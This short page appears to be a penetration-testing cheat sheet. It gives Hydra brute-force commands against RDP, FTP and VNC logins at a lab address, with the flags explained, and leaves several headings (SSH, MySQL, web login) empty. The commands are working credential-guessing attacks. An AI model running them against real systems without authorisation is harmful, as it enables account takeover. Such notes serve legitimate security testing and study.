Hydra
Hydra Brute Force
RDP
hydra -t 4 -V -f -l administrator -P rockyou.txt rdp://10.10.10.10
-t: number of tasks run in parallel
-V: verbose
-f: quit once correct credentials found
-l: username
-P: passwords on a fileFTP
hydra -t 5 -V -f -L userlist -P passwordlist ftp://10.10.10.10
-t: number of tasks run in parallel
-V: verbose
-f: quit once correct credentials found
-l: username list
-P: password listVNC
hydra -P passwordlist -t 1 -w 5 -f -s 5901 10.10.10.10 vnc -v
-s: port to connect toSSH
MySQL
Web Login
Basic Authentication
Last updated
Was this helpful?